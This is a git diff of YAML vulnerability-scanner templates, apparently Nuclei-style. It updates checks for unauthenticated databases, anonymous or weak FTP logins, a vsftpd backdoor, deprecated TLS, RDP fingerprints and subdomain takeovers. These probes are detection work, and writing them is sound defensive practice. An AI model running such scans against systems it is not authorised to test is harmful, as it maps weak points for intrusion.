index 79b7682bf7..304da8b4e0 100644
--- a/misconfiguration/wamp-server-configuration.yaml
+++ b/misconfiguration/wamp-server-configuration.yaml
@@ -1,24 +1,24 @@
-id: wamp-server-configuration
+id: wamp-server-configuration
 
-info:
-  name: default-wamp-server-page
-  author: pussycat0x
-  severity: medium
-  description: Wamp default page will expose sensitive configuration and vhosts.
-  reference: https://www.exploit-db.com/ghdb/6891.
-  tags: wamp,exposure
+info:
+  name: default-wamp-server-page
+  author: pussycat0x
+  severity: medium
+  description: Wamp default page will expose sensitive configuration and vhosts.
+  reference: https://www.exploit-db.com/ghdb/6891.
+  tags: wamp,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(tolower(body), "wampserver")'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(body), "wampserver")'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/wp-registration-enabled.yaml b/misconfiguration/wp-registration-enabled.yaml
new file mode 100644
index 0000000000..335bcb4212
--- /dev/null
+++ b/misconfiguration/wp-registration-enabled.yaml
@@ -0,0 +1,37 @@
+id: wp-registration-enabled
+
+info:
+  name: WordPress User Registration Enabled
+  author: tess,DhiyaneshDK
+  severity: info
+  description: |
+    Your WordPress site is currently configured so that anyone can register as a user. If you are not using this functionality, it's recommended to disable user registration as it caused some security issues in the past and is increasing the attack surface.
+  remediation: |
+    Disable user registration if not needed. To disable user registration, log in as an administrator and go to Settings -> General and uncheck "Anyone can register".
+  reference:
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-user-registration-enabled/
+  metadata:
+    verified: true
+  tags: wordpress,wp,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-login.php"
+
+    matchers-condition: and
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '?action=register"'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/xss-deprecated-header.yaml b/misconfiguration/xss-deprecated-header.yaml
new file mode 100644
index 0000000000..253698237f
--- /dev/null
+++ b/misconfiguration/xss-deprecated-header.yaml
@@ -0,0 +1,36 @@
+id: xss-deprecated-header-detect
+
+info:
+  name: Detect Deprecated XSS Protection Header
+  author: joshlarsen
+  severity: info
+  description: Setting the XSS-Protection header is deprecated by most browsers. Setting the header to anything other than `0` can actually introduce an XSS vulnerability.
+  reference:
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection
+    - https://owasp.org/www-project-secure-headers/#x-xss-protection
+  tags: xss,misconfig,generic
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)x-xss-protection: 0"
+        negative: true
+
+      - type: regex
+        part: header
+        regex:
+          - "(?i)x-xss-protection: 1+"
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - x_xss_protection
diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml
index fdeeda0601..3e99e47975 100644
--- a/misconfiguration/zabbix-dashboards-access.yaml
+++ b/misconfiguration/zabbix-dashboards-access.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
     cvss-score: 5.8
     cwe-id: CWE-522
-  tags: zabbix,unauth
+  tags: edb,packetstorm,zabbix,unauth
 
 requests:
   - method: GET
diff --git a/misconfiguration/zabbix-error.yaml b/misconfiguration/zabbix-error.yaml
index 77772948a1..20457ddb4d 100644
--- a/misconfiguration/zabbix-error.yaml
+++ b/misconfiguration/zabbix-error.yaml
@@ -4,8 +4,8 @@ info:
   name: Zabbix Error
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Warning+%5Brefreshed+every+30+sec.%5D%22
+  metadata:
+    shodan-query: http.title:"Warning [refreshed every 30 sec.]"
   tags: zabbix,misconfig
 
 requests:
diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml
index 5c036da74f..350b6f56d1 100644
--- a/network/clickhouse-unauth.yaml
+++ b/network/clickhouse-unauth.yaml
@@ -1,9 +1,10 @@
 id: clickhouse-unauth
 
 info:
-  name: Unauth ClickHouse Disclosure
+  name: ClickHouse - Unauthorized Access
   author: lu4nx
   severity: high
+  description: ClickHouse was able to be accessed with no required authentication in place.
   tags: network,clickhouse,unauth
 
 network:
@@ -23,4 +24,6 @@ network:
         words:
           - "ClickHouse"
           - "UTC"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/07/20
diff --git a/network/cowrie-honeypot-detect.yaml b/network/cowrie-honeypot-detect.yaml
index 91814a41bd..56a629d83f 100644
--- a/network/cowrie-honeypot-detect.yaml
+++ b/network/cowrie-honeypot-detect.yaml
@@ -4,11 +4,13 @@ info:
   name: Cowrie SSH Honeypot Detect
   author: thesubtlety
   severity: info
+  description: |
+    Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system.
   reference:
     - https://web.archive.org/web/20170826075224/https://morris.sc/detecting-kippo-ssh-honeypots/
     - https://github.com/blazeinfosec/detect-kippo-cowrie/blob/master/detectKippoCowrie.py
     - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/detect_kippo.rb
-  tags: network,ssh,honeypot
+  tags: network,ssh,honeypot,msf
 
 network:
   - host:
diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detect-addpac-voip-gateway.yaml
index 9691d398fd..be3fa733fd 100644
--- a/network/detect-addpac-voip-gateway.yaml
+++ b/network/detect-addpac-voip-gateway.yaml
@@ -4,6 +4,8 @@ info:
   name: Detect AddPac Technology GSM VoIP Gateway
   author: geeknik
   severity: info
+  description: |
+    AddPac GSM Gateway solution provides GSM VoIP gateway function from 1 Port up to 80 Ports.
   reference:
     - http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf
   tags: network,addpac,apos,voip
diff --git a/network/detect-rsyncd.yaml b/network/detect-rsyncd.yaml
index ae708e9acc..e380bc6d30 100644
--- a/network/detect-rsyncd.yaml
+++ b/network/detect-rsyncd.yaml
@@ -4,6 +4,8 @@ info:
   name: Detect rsyncd
   author: vsh00t,geeknik
   severity: info
+  description: |
+    Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon.
   reference:
     - https://linux.die.net/man/1/rsync
   tags: network,rsyncd
diff --git a/network/expn-mail-detect.yaml b/network/expn-mail-detect.yaml
index 729fe47f7a..f7e32264f9 100644
--- a/network/expn-mail-detect.yaml
+++ b/network/expn-mail-detect.yaml
@@ -4,6 +4,8 @@ info:
   name: EXPN Mail Server Detect
   author: r3dg33k
   severity: info
+  description: |
+    The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information.
   tags: mail,expn,network
 
 network:
@@ -19,4 +21,4 @@ network:
     matchers:
       - type: word
         words:
-          - "250-EXPN"
\ No newline at end of file
+          - "250-EXPN"
diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml
index a2fac4fc2f..94d958b4d3 100644
--- a/network/exposed-redis.yaml
+++ b/network/exposed-redis.yaml
@@ -1,9 +1,10 @@
 id: exposed-redis
 
 info:
-  name: Redis Unauth Server
+  name: Redis Server - Unauthenticated Access
   author: pdteam
   severity: high
+  description: Redis server without any required authentication was discovered.
   reference:
     - https://redis.io/topics/security
   tags: network,redis,unauth
@@ -26,3 +27,5 @@ network:
         negative: true
         words:
           - "redis_mode:sentinel"
+
+# Enhanced by mp on 2022/07/20
diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml
index da21739da6..dc86cfa297 100644
--- a/network/exposed-zookeeper.yaml
+++ b/network/exposed-zookeeper.yaml
@@ -1,9 +1,10 @@
 id: exposed-zookeeper
 
 info:
-  name: ZooKeeper Unauth Server
+  name: Apache ZooKeeper - Unauthenticated Access
   author: pdteam
   severity: high
+  description: Apache ZooKeeper was able to be accessed without any required authentication.
   reference:
     - https://zookeeper.apache.org/security.html
   tags: network,zookeeper,unauth
@@ -21,3 +22,5 @@ network:
       - type: word
         words:
           - "zookeeper.version"
+
+# Enhanced by mp on 2022/07/21
diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml
index 8f87be9349..0f0c5eecb7 100644
--- a/network/ftp-default-credentials.yaml
+++ b/network/ftp-default-credentials.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: info
   tags: network,ftp,default-login,service
+  description: |
+    Using the Internet's File Transfer Protocol (FTP), anonymous FTP is a method for giving users access to files so that they don't need to identify themselves to the server.
 
 network:
 
diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml
index a3c092e56a..b93671d3bb 100644
--- a/network/ftp-weak-credentials.yaml
+++ b/network/ftp-weak-credentials.yaml
@@ -1,9 +1,15 @@
 id: ftp-weak-credentials
 
 info:
-  name: FTP Service with weak credentials
+  name: FTP Service - Credential Weakness
   author: pussycat0x
-  severity: critical
+  severity: high
+  description: An FTP service was accessed with easily guessed credentials.
+  reference:
+    - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
+  classification:
+    cvss-score: 8.5
+    cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
   tags: network,ftp,default-login,service
 
 network:
@@ -33,3 +39,5 @@ network:
       - type: word
         words:
           - "230 Login successful"
+
+# Enhanced by mp on 2022/05/23
diff --git a/network/gopher-detection.yaml b/network/gopher-detection.yaml
new file mode 100644
index 0000000000..e1aa095d97
--- /dev/null
+++ b/network/gopher-detection.yaml
@@ -0,0 +1,21 @@
+id: gopher-detection
+
+info:
+  name: Gopher Detection
+  author: pry0cc
+  severity: info
+  tags: network,gopher
+  description: |
+    Gopher is an application-layer protocol that provides the ability to extract and view Web documents stored on remote Web servers.
+
+network:
+  - inputs:
+      - data: "\r\n"
+    host:
+      - "{{Hostname}}"
+      - "{{Host}}:70"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(to_lower(raw), 'gopher')"
diff --git a/network/iplanet-imap-detect.yaml b/network/iplanet-imap-detect.yaml
index 0b01c5bddf..d9cbf22df1 100644
--- a/network/iplanet-imap-detect.yaml
+++ b/network/iplanet-imap-detect.yaml
@@ -7,6 +7,8 @@ info:
   metadata:
     fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap"
   tags: network,imap
+  description: |
+    iPlanet Messaging Server is a powerful, standards-based Internet messaging server designed for high-capacity, reliable handling of the messaging needs.
 
 network:
   - inputs:
diff --git a/network/java-rmi-detect.yaml b/network/java-rmi-detect.yaml
index 798a559d01..fd7523ae1a 100644
--- a/network/java-rmi-detect.yaml
+++ b/network/java-rmi-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: F1tz
   severity: info
   tags: network,rmi,java
+  description: |
+    A security vulnerability in the Remote Method Invocation component of the Java Runtime Environment allows unauthenticated network attacks which can result in unauthorized operating system takeover including arbitrary code execution.
 
 network:
   - inputs:
diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml
index 0ebe549791..4f28cc7f86 100644
--- a/network/memcached-stats.yaml
+++ b/network/memcached-stats.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: low
   tags: network,memcached
+  description: |
+    Memcached stats is used to return server statistics such as PID, version, connections, etc.
 
 network:
   - inputs:
@@ -18,4 +20,4 @@ network:
     matchers:
       - type: word
         words:
-          - "STAT "
\ No newline at end of file
+          - "STAT "
diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml
index 6aa1bb1334..dc9332f659 100644
--- a/network/mongodb-detect.yaml
+++ b/network/mongodb-detect.yaml
@@ -7,6 +7,8 @@ info:
   reference:
     - https://github.com/orleven/Tentacle
   tags: network,mongodb
+  description: |
+    MongoDB is an open source NoSQL database management program. NoSQL is used as an alternative to traditional relational databases.
 
 network:
   - inputs:
@@ -22,4 +24,4 @@ network:
       - type: word
         words:
           - "logicalSessionTimeout"
-          - "localTime"
\ No newline at end of file
+          - "localTime"
diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml
index 9883dc2bca..b93aa67915 100644
--- a/network/mongodb-unauth.yaml
+++ b/network/mongodb-unauth.yaml
@@ -1,9 +1,10 @@
 id: mongodb-unauth
 
 info:
-  name: Unauth MongoDB Disclosure
+  name: MongoDB - Unauthenticated Access
   author: pdteam
   severity: high
+  description: MongoDB was able to be accessed with no password. Note that MongoDB does not require a password by default.
   reference:
     - https://github.com/orleven/Tentacle
     - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
@@ -24,3 +25,5 @@ network:
       - type: word
         words:
           - "totalLinesWritten"
+
+# Enhanced by mp on 2022/07/20
diff --git a/network/openssh-detection.yaml b/network/openssh-detection.yaml
new file mode 100644
index 0000000000..f84c2c87a5
--- /dev/null
+++ b/network/openssh-detection.yaml
@@ -0,0 +1,31 @@
+id: openssh-detection
+
+info:
+  name: OpenSSH Detection
+  author: r3dg33k,daffainfo,iamthefrogy
+  severity: info
+  reference:
+    - http://www.openwall.com/lists/oss-security/2016/08/01/2
+    - http://www.openwall.com/lists/oss-security/2018/08/15/5
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-6210
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
+    - http://seclists.org/fulldisclosure/2016/Jul/51
+  tags: seclists,network,ssh,openssh
+  description: |
+    OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
+
+
+network:
+  - host:
+      - "{{Hostname}}"
+      - "{{Host}}:22"
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)OpenSSH'
+
+    extractors:
+      - type: regex
+        regex:
+          - '(?i)SSH-(.*)-OpenSSH_[^\r]+'
diff --git a/network/printers-info-leak.yaml b/network/printers-info-leak.yaml
index d2b14091b4..c593bbc800 100644
--- a/network/printers-info-leak.yaml
+++ b/network/printers-info-leak.yaml
@@ -7,6 +7,8 @@ info:
   reference:
     - https://book.hacktricks.xyz/pentesting/9100-pjl
   tags: network,iot,printer
+  description: |
+    Unauthorized access to printers allows attackers to print, eavesdrop sensitive documents.
 
 network:
   - inputs:
diff --git a/network/rdp-detect.yaml b/network/rdp-detect.yaml
index 051db6c51d..cb96595371 100644
--- a/network/rdp-detect.yaml
+++ b/network/rdp-detect.yaml
@@ -4,7 +4,11 @@ info:
   name: Windows RDP Detection
   author: princechaddha
   severity: info
-  tags: windows,rdp,network
+  metadata:
+    verified: true
+  tags: network,windows,rdp
+  description: |
+    Remote Desktop Protocol allows users to connect and control remote server easily.
 
 network:
   - inputs:
@@ -13,45 +17,64 @@ network:
     read-size: 2048
 
     host:
-      - "{{Hostname}}"
       - "{{Host}}:3389"
+      - "{{Hostname}}"
 
     matchers:
+      - type: word
+        name: rdp
+        encoding: hex
+        words:
+          - "030000130ed"
+
       - type: word
         encoding: hex
         name: win2000
         words:
           - "0300000b06d00000123400"
+
       - type: word
         encoding: hex
         name: win2003
         words:
           - "030000130ed000001234000300080002000000"
+
       - type: word
         encoding: hex
         name: win2008
         words:
           - "030000130ed000001234000200080002000000"
+
       - type: word
         encoding: hex
         name: win7or2008R2
         words:
           - "030000130ed000001234000209080002000000"
+
       - type: word
         encoding: hex
         name: win2008R2DC
         words:
           - "030000130ed000001234000201080002000000"
+
       - type: word
         encoding: hex
         name: win10
         words:
           - "030000130ed00000123400021f080002000000"
+
       - type: word
         encoding: hex
         name: win2012R2OR8
         words:
           - "030000130ed00000123400020f080002000000"
+
+      - type: word
+        encoding: hex
+        name: win2012R2
+        words:
+          - "030000130ed00000123400020f080008000000"
+
       - type: word
         encoding: hex
         name: win2016
diff --git a/network/sap-router.yaml b/network/sap-router.yaml
index 23b62d2605..b22f9a69cc 100644
--- a/network/sap-router.yaml
+++ b/network/sap-router.yaml
@@ -5,6 +5,8 @@ info:
   author: randomstr1ng
   severity: info
   tags: network,sap
+  description: |
+    SAProuter is a software application that provides a remote connection between our customer's network and SAP.
 
 network:
   - inputs:
@@ -19,4 +21,4 @@ network:
     matchers:
       - type: word
         words:
-          - "SAProuter"
\ No newline at end of file
+          - "SAProuter"
diff --git a/network/smb-v1-detection.yaml b/network/smb-v1-detection.yaml
index 60c62d9bca..7199744e90 100644
--- a/network/smb-v1-detection.yaml
+++ b/network/smb-v1-detection.yaml
@@ -7,6 +7,8 @@ info:
   reference:
     - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/
   tags: network,windows,smb,service
+  description: |
+    SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems.
 
 network:
   - inputs:
@@ -20,4 +22,4 @@ network:
     matchers:
       - type: word
         words:
-          - "SMBr"
\ No newline at end of file
+          - "SMBr"
diff --git a/network/smtp-detection.yaml b/network/smtp-detection.yaml
index 422432f0d4..2993c920da 100644
--- a/network/smtp-detection.yaml
+++ b/network/smtp-detection.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: info
   tags: network,service,smtp
+  description: |
+    SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks.
 
 network:
   - inputs:
diff --git a/network/starttls-mail-detect.yaml b/network/starttls-mail-detect.yaml
index 84a931f336..aa1cf6098f 100644
--- a/network/starttls-mail-detect.yaml
+++ b/network/starttls-mail-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: r3dg33k
   severity: info
   tags: mail,starttls,network
+  description: |
+    STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one.
 
 network:
   - inputs:
diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml
index d556c31a53..b34a23eec0 100644
--- a/network/tidb-unauth.yaml
+++ b/network/tidb-unauth.yaml
@@ -1,9 +1,10 @@
 id: tidb-unauth
 
 info:
-  name: Unauth TiDB Disclosure
+  name: TiDB - Unauthenticated Access
   author: lu4nx
   severity: high
+  description: TiDB server was able to be accessed because no authentication was required.
   metadata:
     zoomeye-dork: tidb +port:"4000"
   tags: network,tidb,unauth
@@ -26,3 +27,5 @@ network:
           # resp format:
           # 07: length, 02: sequence number, 00: success
           - "0700000200000002000000"
+
+# Enhanced by mp on 2022/07/20
diff --git a/network/totemomail-smtp-detect.yaml b/network/totemomail-smtp-detect.yaml
index fb7658504d..c7b50abde6 100644
--- a/network/totemomail-smtp-detect.yaml
+++ b/network/totemomail-smtp-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: info
   tags: mail,smtp,network,totemomail
+  description: |
+    Totemomail is a comprehensive email solution designed to address all aspects of digital communication security.
 
 network:
   - inputs:
diff --git a/network/unauth-ftp.yaml b/network/unauth-ftp.yaml
index e3c21171fa..01d4d9ec70 100644
--- a/network/unauth-ftp.yaml
+++ b/network/unauth-ftp.yaml
@@ -7,6 +7,9 @@ info:
   reference:
     - https://tools.ietf.org/html/rfc2577
   tags: network,ftp
+  description: |
+    Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended.
+
 
 network:
   - inputs:
@@ -20,4 +23,4 @@ network:
       - type: word
         words:
           - "Anonymous access allowed,"
-        part: response
\ No newline at end of file
+        part: response
diff --git a/network/vsftpd-detection.yaml b/network/vsftpd-detection.yaml
index 79f93defe0..04e90c4756 100644
--- a/network/vsftpd-detection.yaml
+++ b/network/vsftpd-detection.yaml
@@ -1,16 +1,22 @@
 id: vsftpd-detection
 
 info:
-  name: VSFTPD v2.3.4 Backdoor Command Execution
+  name: VSFTPD 2.3.4 - Backdoor Command Execution
   author: pussycat0x
   severity: critical
+  description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability.
   reference:
     - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-78
+  remediation: This backdoor was removed on July 3rd, 2011.
   tags: network,vsftpd,ftp,backdoor
 
 network:
   - inputs:
-      - data: "USER anonymous\r\nPASS pussycat0x\r\n"
+      - data: "USER anonymous\r\nPASS anonymous\r\n"
 
     host:
       - "{{Host}}:21"
@@ -20,3 +26,5 @@ network:
       - type: word
         words:
           - "vsFTPd 2.3.4"
+
+# Enhanced by mp on 2022/05/23
diff --git a/network/weblogic-iiop-detect.yaml b/network/weblogic-iiop-detect.yaml
index 1aae2ded85..221ba8cbc4 100644
--- a/network/weblogic-iiop-detect.yaml
+++ b/network/weblogic-iiop-detect.yaml
@@ -4,8 +4,9 @@ info:
   name: Detect Weblogic IIOP Protocol
   author: F1tz
   severity: info
-  description: Check IIOP protocol status.
   tags: network,weblogic
+  description: |
+    The IIOP (Internet Inter-ORB Protocol) protocol makes it possible for distributed programs written in different programming languages to communicate over the Internet.
 
 network:
   - inputs:
diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml
index 79f4887cf5..048e855016 100644
--- a/network/weblogic-t3-detect.yaml
+++ b/network/weblogic-t3-detect.yaml
@@ -4,8 +4,9 @@ info:
   name: Detect Weblogic T3 Protocol
   author: F1tz,milo2012,wdahlenb
   severity: info
-  description: Check T3 protocol status.
   tags: network,weblogic
+  description: |
+    T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.
 
 network:
   - inputs:
diff --git a/ssl/deprecated-tls.yaml b/ssl/deprecated-tls.yaml
index c13005d1ed..100968c9c5 100644
--- a/ssl/deprecated-tls.yaml
+++ b/ssl/deprecated-tls.yaml
@@ -1,11 +1,15 @@
 id: deprecated-tls
 
 info:
-  name: Deprecated TLS Detection (inferior to TLS 1.2)
-  author: righettod
+  name: Deprecated TLS Detection (TLS 1.1 or SSLv3)
+  author: righettod,forgedhallpass
   severity: info
   reference:
     - https://ssl-config.mozilla.org/#config=intermediate
+  description: |
+    Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption.
+  remediation: |
+    Update the web server's TLS configuration to disable TLS 1.1 and SSLv3.
   metadata:
     shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1
   tags: ssl
@@ -13,6 +17,24 @@ info:
 ssl:
   - address: "{{Host}}:{{Port}}"
     min_version: sslv3
+    max_version: sslv3
+
+    extractors:
+      - type: json
+        json:
+          - " .tls_version"
+
+  - address: "{{Host}}:{{Port}}"
+    min_version: tls10
+    max_version: tls10
+
+    extractors:
+      - type: json
+        json:
+          - " .tls_version"
+
+  - address: "{{Host}}:{{Port}}"
+    min_version: tls11
     max_version: tls11
 
     extractors:
diff --git a/ssl/self-signed-ssl.yaml b/ssl/self-signed-ssl.yaml
new file mode 100644
index 0000000000..ff4d602cb5
--- /dev/null
+++ b/ssl/self-signed-ssl.yaml
@@ -0,0 +1,28 @@
+id: self-signed-ssl
+
+info:
+  name: Self Signed SSL Certificate
+  author: righettod,pdteam
+  severity: low
+  tags: ssl
+
+ssl:
+  - address: "{{Host}}:{{Port}}"
+
+    extractors:
+      - type: json
+        name: common_name
+        json:
+          - ".common_name[]"
+        internal: true
+
+      - type: json
+        name: issuer_common_name
+        json:
+          - ".issuer_common_name[]"
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "common_name == issuer_common_name"
\ No newline at end of file
diff --git a/takeovers/aftership-takeover.yaml b/takeovers/aftership-takeover.yaml
index 2d1c439020..7db83c4367 100644
--- a/takeovers/aftership-takeover.yaml
+++ b/takeovers/aftership-takeover.yaml
@@ -1,9 +1,10 @@
 id: aftership-takeover
 
 info:
-  name: Aftership Takeover Detection
+  name: Aftership - Subdomain Takeover Detection
   author: pdteam
   severity: high
+  description: Aftership subdomain takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   tags: takeover
@@ -16,4 +17,6 @@ requests:
     matchers:
       - type: word
         words:
-          - Oops.</h2><p class="text-muted text-tight">The page you're looking for doesn't exist.
\ No newline at end of file
+          - Oops.</h2><p class="text-muted text-tight">The page you're looking for doesn't exist.
+
+# Enhanced by mp on 2022/07/20
diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml
index 85a2447b81..1aa0629707 100644
--- a/takeovers/agilecrm-takeover.yaml
+++ b/takeovers/agilecrm-takeover.yaml
@@ -1,9 +1,10 @@
 id: agilecrm-takeover
 
 info:
-  name: agilecrm takeover detection
+  name: agilecrm - Subdomain Takeover Detection
   author: pdteam
   severity: high
+  description: agilecrm subdomain takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   tags: takeover
@@ -16,4 +17,6 @@ requests:
     matchers:
       - type: word
         words:
-          - Sorry, this page is no longer available.
\ No newline at end of file
+          - Sorry, this page is no longer available.
+
+# Enhanced by mp on 2022/07/20
diff --git a/takeovers/aha-takeover.yaml b/takeovers/aha-takeover.yaml
index e6e8200eec..dd4502fc63 100644
--- a/takeovers/aha-takeover.yaml
+++ b/takeovers/aha-takeover.yaml
@@ -1,9 +1,10 @@
 id: aha-takeover
 
 info:
-  name: Aha Takeover Detection
+  name: Aha - Subdomain Takeover Detection
   author: pdteam
   severity: high
+  description: An Aha subdomain takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   tags: takeover
@@ -16,4 +17,6 @@ requests:
     matchers:
       - type: word
         words:
-          - There is no portal here ... sending you back to Aha!
\ No newline at end of file
+          - There is no portal here ... sending you back to Aha!
+
+# Enhanced by mp on 2022/07/19
diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml
index 2440b15ac1..b0eaa68779 100644
--- a/takeovers/announcekit-takeover.yaml
+++ b/takeovers/announcekit-takeover.yaml
@@ -1,25 +1,25 @@
-id: announcekit-takeover
+id: announcekit-takeover
 
-info:
-  name: Announcekit Takeover Detection
-  author: melbadry9
-  severity: high
-  tags: takeover,announcekit
-  reference:
-    - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
-    - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
+info:
+  name: Announcekit Takeover Detection
+  author: melbadry9
+  severity: high
+  tags: takeover,announcekit
+  reference:
+    - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
+    - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - 'Error 404 - AnnounceKit'
-
-      - type: status
-        status:
-          - 404
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Error 404 - AnnounceKit'
+
+      - type: status
+        status:
+          - 404
diff --git a/takeovers/gitbook-takeover.yaml b/takeovers/gitbook-takeover.yaml
index a8f26b9f08..09f8d9062d 100644
--- a/takeovers/gitbook-takeover.yaml
+++ b/takeovers/gitbook-takeover.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/259
     - https://hackerone.com/reports/223625
-  tags: takeover,gitbook
+  tags: takeover,gitbook,hackerone
 
 requests:
   - method: GET
diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml
index 2f29197ec0..9ae4f7e121 100644
--- a/takeovers/github-takeover.yaml
+++ b/takeovers/github-takeover.yaml
@@ -26,4 +26,4 @@ requests:
           - '!contains(host,"githubapp.com")'
           - '!contains(host,"github.com")'
           - '!contains(host,"github.io")'
-        condition: or
\ No newline at end of file
+        condition: and
diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml
index de63606ff8..a1a257d815 100644
--- a/takeovers/netlify-takeover.yaml
+++ b/takeovers/netlify-takeover.yaml
@@ -16,10 +16,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "Not found - Request ID:"
+          - "Not Found - Request ID:"
+        case-insensitive: true
 
       - type: word
+        part: header
         words:
           - "Netlify"
-        part: header
diff --git a/takeovers/uservoice-takeover.yaml b/takeovers/uservoice-takeover.yaml
new file mode 100644
index 0000000000..2e2a81f6cb
--- /dev/null
+++ b/takeovers/uservoice-takeover.yaml
@@ -0,0 +1,19 @@
+id: uservoice-takeover
+
+info:
+  name: Uservoice Takeover Detection
+  author: MiryangJung
+  severity: high
+  reference:
+    - https://github.com/EdOverflow/can-i-take-over-xyz
+  tags: takeover,uservoice
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        words:
+          - "This UserVoice subdomain is currently available!"
diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml
index c594c3a15b..7f42a09ee8 100644
--- a/takeovers/wix-takeover.yaml
+++ b/takeovers/wix-takeover.yaml
